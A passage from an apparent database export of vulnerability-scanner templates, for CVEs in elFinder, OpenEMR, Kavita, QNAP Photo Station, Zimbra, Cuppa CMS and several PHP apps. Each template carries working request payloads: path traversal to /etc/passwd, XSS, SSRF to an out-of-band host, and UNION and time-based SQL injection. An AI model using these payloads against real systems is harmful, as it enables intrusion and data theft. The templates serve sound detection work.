<=2.1.60 - Local File Inclusion\n author: pikpikcu\n 
severity: critical\n description: |\n elFinder through 2.1.60 is affected by local file inclusion via connector.minimal.php. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system.\n remediation: |\n Upgrade elFinder to version 2.1.61 or later to mitigate this vulnerability.\n reference:\n - https://www.synacktiv.com/publications/elfinder-the-story-of-a-repwning.html\n - https://github.com/Studio-42/elFinder/commit/3b758495538a448ac8830ee3559e7fb2c260c6db\n - https://www.synacktiv.com/publications.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-26960\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N\n cvss-score: 9.1\n cve-id: CVE-2022-26960\n cwe-id: CWE-22\n epss-score: 0.85922\n epss-percentile: 0.98481\n cpe: cpe:2.3:a:std42:elfinder:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: std42\n product: elfinder\n tags: cve2022,cve,lfi,elfinder,std42\n\nhttp:\n - raw:\n - |\n GET /elfinder/php/connector.minimal.php?cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>&download=1 HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100b51a2dee0a9598c7c1f521f9373c5bb35728dda0693010a4db82ab044f7124d4022006a5200a4741c2b9c8d1102b86fd448d48abe1e0af4e543f0ea00920ed47e9ee:922c64590222798bb761d5b6d8e72950", "hash": "1f13fa5afc5a792293dff1a04d302650", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084ed" }, "name": 
"CVE-2022-2733.yaml", "content": "id: CVE-2022-2733\n\ninfo:\n name: Openemr < 7.0.0.1 - Cross-Site Scripting\n author: ctflearner\n severity: medium\n description: |\n Cross-site Scripting (XSS) - Reflected in GitHub repository openemr/openemr prior to 7.0.0.1.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade Openemr to version 7.0.0.1 or later to mitigate this vulnerability.\n reference:\n - https://huntr.dev/bounties/25b91301-dfb0-4353-a732-e051bbe8420c/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-2733\n - https://github.com/openemr/openemr/commit/59458bc15ab0cb556c521de9d5187167d6f88945\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-2733\n cwe-id: CWE-79\n epss-score: 0.00143\n epss-percentile: 0.49164\n cpe: cpe:2.3:a:open-emr:openemr:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: open-emr\n product: openemr\n shodan-query: title:\"OpenEMR\"\n tags: cve,cve2022,xss,openemr,authenticated,huntr,open-emr\n\nhttp:\n - raw:\n - |\n POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1\n Host: {{Hostname}}\n Origin: {{RootURL}}\n Content-Type: application/x-www-form-urlencoded\n Referer: {{RootURL}}/interface/login/login.php?site=default\n\n new_login_session_management=1&languageChoice=1&authUser={{username}}&clearPass={{password}}&languageChoice=1\n - |\n GET /interface/forms/fee_sheet/review/fee_sheet_options_ajax.php?pricelevel=%3Cimg%20src=a%20onerror=alert(document.cookie)%3E HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '<img src=a onerror=alert(document.cookie)>'\n - 'pricelevel'\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: 
status\n status:\n - 200\n# digest: 490a00463044022067808d2ef89464f8783342be709967c65dd881e44614eb5c38c240f26f031a7c02201f9e9db2f41292d877197f390bc061a2bf455dc58d83e13a92b5baa0612b7cc4:922c64590222798bb761d5b6d8e72950", "hash": "0d76656e3b4313d1c9e1188f14739114", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084ee" }, "name": "CVE-2022-2756.yaml", "content": "id: CVE-2022-2756\n\ninfo:\n name: Kavita <0.5.4.1 - Server-Side Request Forgery\n author: theamanrawat\n severity: medium\n description: |\n Kavita before 0.5.4.1 is susceptible to server-side request forgery in GitHub repository kareadita/kavita. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability can result in unauthorized access to sensitive information or systems, leading to potential data breaches or further attacks.\n remediation: Fixed in 0.5.4.1.\n reference:\n - https://huntr.dev/bounties/95e7c181-9d80-4428-aebf-687ac55a9216/\n - https://github.com/kareadita/kavita\n - https://github.com/kareadita/kavita/commit/9c31f7e7c81b919923cb2e3857439ec0d16243e4\n - https://nvd.nist.gov/vuln/detail/CVE-2022-2756\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 6.5\n cve-id: CVE-2022-2756\n cwe-id: CWE-918\n epss-score: 0.01579\n epss-percentile: 0.87037\n cpe: cpe:2.3:a:kavitareader:kavita:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: kavitareader\n product: kavita\n shodan-query: title:\"kavita\"\n tags: cve,cve2022,ssrf,kavita,authenticated,huntr,intrusive,kavitareader\n\nhttp:\n - raw:\n - |\n POST /api/account/login HTTP/1.1\n Host: {{Hostname}}\n Accept: application/json, text/plain, */*\n Content-Type: application/json\n\n {\"username\":\"{{username}}\",\"password\":\"{{password}}\"}\n - |\n POST /api/upload/upload-by-url HTTP/1.1\n 
Host: {{Hostname}}\n Accept: application/json, text/plain, */*\n Authorization: Bearer {{token}}\n Content-Type: application/json\n\n {\"url\":\"http://oast.me/#.png\"}\n - |\n GET /api/image/cover-upload?filename=coverupload_{(unknown)}.png HTTP/1.1\n Host: {{Hostname}}\n Authorization: Bearer {{token}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body_3\n words:\n - Interactsh Server\n\n - type: word\n part: header\n words:\n - image/png\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n name: token\n group: 1\n regex:\n - '\"token\":\"(.*?)\"'\n internal: true\n\n - type: regex\n name: filename\n group: 1\n regex:\n - coverupload.(.*?).png\n internal: true\n# digest: 4b0a0048304602210085857e4680115374eb6a9159f4e37003a795b63ad4ad57ea849bb25b04ec899c022100ceac60030e13ddb109cf88cfcaf3066ff8140a87aed39031c9429979c6d07952:922c64590222798bb761d5b6d8e72950", "hash": "090bfbd573c59f083bc2aa67fc55aa08", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084ef" }, "name": "CVE-2022-27593.yaml", "content": "id: CVE-2022-27593\n\ninfo:\n name: QNAP QTS Photo Station External Reference - Local File Inclusion\n author: allenwest24\n severity: critical\n description: |\n QNAP QTS Photo Station External Reference is vulnerable to local file inclusion via an externally controlled reference to a resource vulnerability. If exploited, this could allow an attacker to modify system files. 
The vulnerability is fixed in the following versions: QTS 5.0.1: Photo Station 6.1.2 and later QTS 5.0.0/4.5.x: Photo Station 6.0.22 and later QTS 4.3.6: Photo Station 5.7.18 and later QTS 4.3.3: Photo Station 5.4.15 and later QTS 4.2.6: Photo Station 5.2.14 and later.\n impact: |\n An attacker can exploit this vulnerability to read sensitive files, execute arbitrary code, or launch further attacks.\n remediation: |\n Apply the latest security patches and updates provided by QNAP to fix the local file inclusion vulnerability in QTS Photo Station.\n reference:\n - https://attackerkb.com/topics/7We3SjEYVo/cve-2022-27593\n - https://www.qnap.com/en/security-advisory/qsa-22-24\n - https://nvd.nist.gov/vuln/detail/CVE-2022-27593\n - https://github.com/20142995/sectool\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H\n cvss-score: 9.1\n cve-id: CVE-2022-27593\n cwe-id: CWE-610\n epss-score: 0.56352\n epss-percentile: 0.97624\n cpe: cpe:2.3:a:qnap:photo_station:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: qnap\n product: photo_station\n shodan-query: title:\"QNAP\"\n tags: cve2022,cve,qnap,lfi,kev\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/photo/combine.php?type=javascript&g=core-r7rules/../../../hello.php.\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: response\n words:\n - \"!function(p,qa){\"\n - \"module.exports\"\n - \"application/javascript\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022029ff7ca9eec78f978cca636c260d69c4dd0975c46068c8d981049465b985c390022100d935e9c82c8fbb7d5cf9b1a5ffaef6ff36ceb942e8d2df6a703342de6a8c829e:922c64590222798bb761d5b6d8e72950", "hash": "9d7ea7bc9c163b1e54dce59128867863", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084f0" }, "name": "CVE-2022-27849.yaml", "content": "id: CVE-2022-27849\n\ninfo:\n name: WordPress Simple Ajax Chat <20220116 - 
Sensitive Information Disclosure vulnerability\n author: random-robbie\n severity: high\n description: |\n WordPress Simple Ajax Chat before 20220216 is vulnerable to sensitive information disclosure. The plugin does not properly restrict access to the exported data via the sac-export.csv file, which could allow unauthenticated users to access it.\n impact: |\n An attacker can exploit this vulnerability to gain access to sensitive information, such as user credentials or private messages.\n remediation: |\n Update to the latest version of the WordPress Simple Ajax Chat plugin to fix the vulnerability.\n reference:\n - https://wordpress.org/plugins/simple-ajax-chat/#developers\n - https://patchstack.com/database/vulnerability/simple-ajax-chat/wordpress-simple-ajax-chat-plugin-20220115-sensitive-information-disclosure-vulnerability\n - https://nvd.nist.gov/vuln/detail/CVE-2022-27849\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-27849\n cwe-id: CWE-200\n epss-score: 0.00713\n epss-percentile: 0.80067\n cpe: cpe:2.3:a:plugin-planet:simple_ajax_chat:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: plugin-planet\n product: simple_ajax_chat\n framework: wordpress\n google-query: inurl:/wp-content/plugins/simple-ajax-chat/\n tags: cve,cve2022,wp,wordpress,wp-plugin,disclosure,plugin-planet\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/wp-content/plugins/simple-ajax-chat/sac-export.csv'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\"Chat Log\"'\n - '\"User IP\"'\n - '\"User ID\"'\n condition: and\n\n - type: word\n part: header\n words:\n - text/csv\n\n - type: status\n status:\n - 200\n# digest: 
490a0046304402200ac201e5da2db9585d76d187f6a6ede0350f1c6230c3c80676234cb41a9e8259022037d381d175e583e6490612c81f07c12a325a2dc7252ba6dcc9f5d27cc59d94d2:922c64590222798bb761d5b6d8e72950", "hash": "5c6b03240ae5408acab66dd28351da4e", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084f1" }, "name": "CVE-2022-27926.yaml", "content": "id: CVE-2022-27926\n\ninfo:\n name: Zimbra Collaboration (ZCS) - Cross Site Scripting\n author: rootxharsh,iamnoooob,pdresearch\n severity: medium\n description: |\n A reflected cross-site scripting (XSS) vulnerability in the /public/launchNewWindow.jsp component of Zimbra Collaboration (aka ZCS) 9.0 allows unauthenticated attackers to execute arbitrary web script or HTML via request parameters.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patches or updates provided by Zimbra to fix the XSS vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2022-27926\n - https://wiki.zimbra.com/wiki/Security_Center\n - https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P24\n - https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-27926\n cwe-id: CWE-79\n epss-score: 0.91614\n epss-percentile: 0.98683\n cpe: cpe:2.3:a:zimbra:collaboration:9.0.0:-:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: zimbra\n product: collaboration\n tags: cve,cve2022,zimbra,xss,kev\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/public/error.jsp?errCode=%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '<img src=x onerror=alert(document.domain)>Title???'\n\n - 
type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100a1b0cf5101917cedd767e55813f4fda7435be450388a3f0676ddc42e7cb029a5022100db84abf0b399ac4fe86c377eff7301138cc347dfaf7f20244626e67bd02e9945:922c64590222798bb761d5b6d8e72950", "hash": "e4656d16686e1f386a61ef5c85d87dda", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084f2" }, "name": "CVE-2022-27927.yaml", "content": "id: CVE-2022-27927\n\ninfo:\n name: Microfinance Management System 1.0 - SQL Injection\n author: lucasljm2001,ekrause\n severity: critical\n description: |\n Microfinance Management System 1.0 is susceptible to SQL Injection.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Microfinance Management System 1.0.\n reference:\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27927\n - https://www.sourcecodester.com/sites/default/files/download/oretnom23/mims_0.zip\n - https://www.exploit-db.com/exploits/50891\n - https://nvd.nist.gov/vuln/detail/CVE-2022-27927\n - https://www.sourcecodester.com/php/14822/microfinance-management-system.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-27927\n cwe-id: CWE-89\n epss-score: 0.10451\n epss-percentile: 0.94459\n cpe: cpe:2.3:a:microfinance_management_system_project:microfinance_management_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: microfinance_management_system_project\n product: microfinance_management_system\n tags: cve,cve2022,microfinance,edb,sqli,microfinance_management_system_project\nvariables:\n num: \"999999999\"\n\nhttp:\n - raw:\n - |\n GET 
/mims/updatecustomer.php?customer_number=-1'%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(md5({{num}}),1,2),NULL,NULL,NULL,NULL,NULL,NULL' HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '{{md5({{num}})}}'\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022100f2330cc77d89bc9dfac599714252cb298c5cb445f575714fdaa3d22ce52302d0021f4591789a7daf3fbe297cb9f3ea7331553a85261ca6027546cac70619c403fa:922c64590222798bb761d5b6d8e72950", "hash": "0dc4e62f71c9ada726ebd20764bd7ca8", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084f3" }, "name": "CVE-2022-27984.yaml", "content": "id: CVE-2022-27984\n\ninfo:\n name: Cuppa CMS v1.0 - SQL injection\n author: theamanrawat\n severity: critical\n description: |\n CuppaCMS v1.0 was discovered to contain a SQL injection vulnerability via the menu_filter parameter at /administrator/templates/default/html/windows/right.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire CMS system.\n remediation: |\n Apply the latest patch or upgrade to a newer version of Cuppa CMS that addresses the SQL injection vulnerability (CVE-2022-27984).\n reference:\n - https://github.com/CuppaCMS/CuppaCMS\n - https://nvd.nist.gov/vuln/detail/CVE-2022-27984\n - https://www.cuppacms.com/\n - http://cuppa.com\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-27984\n cwe-id: CWE-89\n epss-score: 0.03664\n epss-percentile: 0.90798\n cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: cuppacms\n product: cuppacms\n tags: cve,cve2022,sqli,cuppa,authenticated,cuppacms\n\nhttp:\n - raw:\n - |\n POST / HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n user={{username}}&password={{password}}&language=en&task=login\n - 
|\n @timeout: 20s\n POST /templates/default/html/windows/right.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n menu_filter=3'+AND+SLEEP(6)--+-&id=211&url=components%2Fmenu%2Fhtml%2Fedit.php&path=component%2Fmenu%2F%26menu_filter%3D3&uniqueClass=window_right_7526357\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=6'\n - 'status_code_2 == 200'\n - 'contains(content_type_2, \"text/html\")'\n - 'contains(body_2, \"components/menu/classes/functions.php\")'\n condition: and\n# digest: 490a0046304402202aca533ac7ec45941b256cec0f2b6411d28d608d69acb8b69ac2b57149574dd20220547b7a1151e2e064fb860d2324294e7f3bc54a6b8b17a3d7e7411e3543d47d13:922c64590222798bb761d5b6d8e72950", "hash": "489e0b309c5fc26a08bd8f014678ab81", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084f4" }, "name": "CVE-2022-27985.yaml", "content": "id: CVE-2022-27985\n\ninfo:\n name: Cuppa CMS v1.0 - SQL injection\n author: theamanrawat\n severity: critical\n description: |\n CuppaCMS v1.0 was discovered to contain a SQL injection vulnerability via /administrator/alerts/alertLightbox.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire CMS system.\n remediation: |\n Upgrade to the latest version of Cuppa CMS or apply the provided patch to fix the SQL injection vulnerability.\n reference:\n - https://github.com/CuppaCMS/CuppaCMS\n - https://nvd.nist.gov/vuln/detail/CVE-2022-27985\n - http://cuppa.com\n - http://www.cuppacms.com/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-27985\n cwe-id: CWE-89\n epss-score: 0.02343\n epss-percentile: 0.89527\n cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: cuppacms\n product: cuppacms\n tags: cve,cve2022,sqli,cuppa,authenticated,cuppacms\nvariables:\n num: 
'999999999'\n\nhttp:\n - raw:\n - |\n POST / HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n user={{username}}&password={{password}}&language=en&task=login\n - |\n POST /alerts/alertLightbox.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n url=components%2Fpermissions%2Flist_permissions_lightbox.php&title=Permissions%3A+profile¶ms%5Bgroup%5D=3'+UNION+ALL+SELECT+md5('{{num}}'),null--+-¶ms%5Breference%5D=41&uniqueClass=new_content_3983163\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '{{md5(num)}}'\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100840dc614f9b8dc4a922d2ecf069a41511326c836f551341d59ca5f56b6d3e2aa02206d9425bf0e7a02ee89a404733062fac7773ec9a5c2166c8a56d00fc1ef080f12:922c64590222798bb761d5b6d8e72950", "hash": "3525f4c139fd2503111e5b6692fa7dab", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084f5" }, "name": "CVE-2022-28022.yaml", "content": "id: CVE-2022-28022\n\ninfo:\n name: Purchase Order Management v1.0 - SQL Injection\n author: theamanrawat\n severity: critical\n description: |\n Purchase Order Management System v1.0 was discovered to contain a SQL injection vulnerability via /purchase_order/classes/Master.php?f=delete_item.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Purchase Order Management v1.0 application.\n reference:\n - https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/purchase-order-management-system/SQLi-1.md\n - https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html\n - 
https://nvd.nist.gov/vuln/detail/CVE-2022-28022\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/debug601/bug_report\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-28022\n cwe-id: CWE-89\n epss-score: 0.02031\n epss-percentile: 0.87755\n cpe: cpe:2.3:a:purchase_order_management_system_project:purchase_order_management_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: \"true\"\n max-request: 1\n vendor: purchase_order_management_system_project\n product: purchase_order_management_system\n tags: cve,cve2022,sqli,purchase-order-management-system,purchase_order_management_system_project\n\nhttp:\n - raw:\n - |\n POST /classes/Master.php?f=delete_item HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n id=test'+AND+(SELECT+2844+FROM+(SELECT(SLEEP(6)))FDTM)+AND+'sWZA'='sWZA\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=6'\n - 'status_code == 200'\n - 'contains(header, \"text/html\")'\n - 'contains(body, \"status\\\":\\\"success\")'\n condition: and\n# digest: 490a0046304402207642be1d7f464fbdee2b2c77ec3ff7744acd40cd51c5d4b48b4d5a1b9eb298970220699beadc0427e71dde4e50f58c205c159cd96486d5cfb6ae26453b5c8a316cca:922c64590222798bb761d5b6d8e72950", "hash": "dde428b70f65cd6256ec6be36eec53a8", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084f6" }, "name": "CVE-2022-28023.yaml", "content": "id: CVE-2022-28023\n\ninfo:\n name: Purchase Order Management v1.0 - SQL Injection\n author: theamanrawat\n severity: critical\n description: |\n Purchase Order Management System v1.0 was discovered to contain a SQL injection vulnerability via /purchase_order/classes/Master.php?f=delete_supplier.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Upgrade to the 
latest version to mitigate this vulnerability.\n reference:\n - https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/purchase-order-management-system/SQLi-2.md\n - https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-28023\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/debug601/bug_report\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-28023\n cwe-id: CWE-89\n epss-score: 0.02266\n epss-percentile: 0.8936\n cpe: cpe:2.3:a:purchase_order_management_system_project:purchase_order_management_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: \"true\"\n max-request: 1\n vendor: purchase_order_management_system_project\n product: purchase_order_management_system\n tags: cve,cve2022,sqli,purchase-order,poms,purchase_order_management_system_project\n\nhttp:\n - raw:\n - |\n POST /classes/Master.php?f=delete_supplier HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n id=aman'+AND+(SELECT+2844+FROM+(SELECT(SLEEP(6)))FDTM)+AND+'sWZA'='sWZA\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=6'\n - 'status_code == 200'\n - 'contains(header, \"text/html\")'\n - 'contains(body, \"status\\\":\\\"success\")'\n condition: and\n# digest: 490a0046304402202679435e70ec7ff77e6356d469e8b023129f6b3378ff568e3d494c06c9bd77530220519ab2ca116d285eff6637fc9215b435f91e6d061fdfc904ee37adad8e051fd6:922c64590222798bb761d5b6d8e72950", "hash": "16f459b571c4cf52d23707b9d23daeee", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084f7" }, "name": "CVE-2022-28032.yaml", "content": "id: CVE-2022-28032\n\ninfo:\n name: Atom CMS v2.0 - SQL Injection\n author: theamanrawat\n severity: critical\n description: |\n AtomCMS 2.0 is vulnerable to SQL Injection via Atom.CMS_admin_ajax_pages.php\n impact: |\n Successful exploitation of this 
vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: Fixed in version Atom CMS v2.1\n reference:\n - https://github.com/thedigicraft/Atom.CMS/issues/263\n - https://nvd.nist.gov/vuln/detail/CVE-2022-28032\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/bornrootcom/fictional-memory\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-28032\n cwe-id: CWE-89\n epss-score: 0.02266\n epss-percentile: 0.8936\n cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: thedigitalcraft\n product: atomcms\n tags: cve,cve2022,sqli,atom,cms,thedigitalcraft\n\nhttp:\n - raw:\n - |\n @timeout: 20s\n GET /admin/ajax/pages.php?id=(sleep(6)) HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=6'\n - 'status_code == 200'\n - 'contains(body, \"Page Deleted\")'\n condition: and\n# digest: 4b0a0048304602210094d3f24fad25a6ad53537e08fc90fcff2bc0b990b179300cf9ca237b2cb0ddc0022100b1f33b959d642b04732cc8fa792d91295bd120f8cef3e993037a2ebf0ab3665c:922c64590222798bb761d5b6d8e72950", "hash": "ec3d7181c422a40f1cd6258152967412", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084f8" }, "name": "CVE-2022-28079.yaml", "content": "id: CVE-2022-28079\n\ninfo:\n name: College Management System 1.0 - SQL Injection\n author: ritikchaddha\n severity: high\n description: |\n College Management System 1.0 contains a SQL injection vulnerability via the course code parameter.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential manipulation of the database.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - 
https://github.com/erengozaydin/College-Management-System-course_code-SQL-Injection-Authenticated\n - https://download.code-projects.org/details/1c3b87e5-f6a6-46dd-9b5f-19c39667866f\n - https://nvd.nist.gov/vuln/detail/CVE-2022-28079\n - https://code-projects.org/college-management-system-in-php-with-source-code/\n - https://www.nu11secur1ty.com/2022/05/cve-2022-28079.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2022-28079\n cwe-id: CWE-89\n epss-score: 0.80212\n epss-percentile: 0.98029\n cpe: cpe:2.3:a:college_management_system_project:college_management_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: college_management_system_project\n product: college_management_system\n tags: cve,cve2022,sqli,cms,collegemanagement,college_management_system_project\nvariables:\n num: \"999999999\"\n\nhttp:\n - raw:\n - |\n POST /admin/asign-single-student-subjects.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n submit=Press&roll_no=3&course_code=sd' UNION ALL SELECT CONCAT(md5({{num}}),12,21),NULL,NULL,NULL,NULL#\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - '{{md5({{num}})}}'\n\n - type: status\n status:\n - 302\n# digest: 4b0a00483046022100ad3280dd169fc265e15a1fb1734bb88fbfe21000ca36ebab37d25784e71c6416022100a02f6644e9b1a7fd03fc3523742435de169ba87b7c110db223a9010dad57fa2a:922c64590222798bb761d5b6d8e72950", "hash": "1493d69f278ab95330337efff15f5428", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084f9" }, "name": "CVE-2022-28080.yaml", "content": "id: CVE-2022-28080\n\ninfo:\n name: Royal Event - SQL Injection\n author: lucasljm2001,ekrause,ritikchaddha\n severity: high\n description: |\n Royal Event is vulnerable to a SQL injection vulnerability.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise 
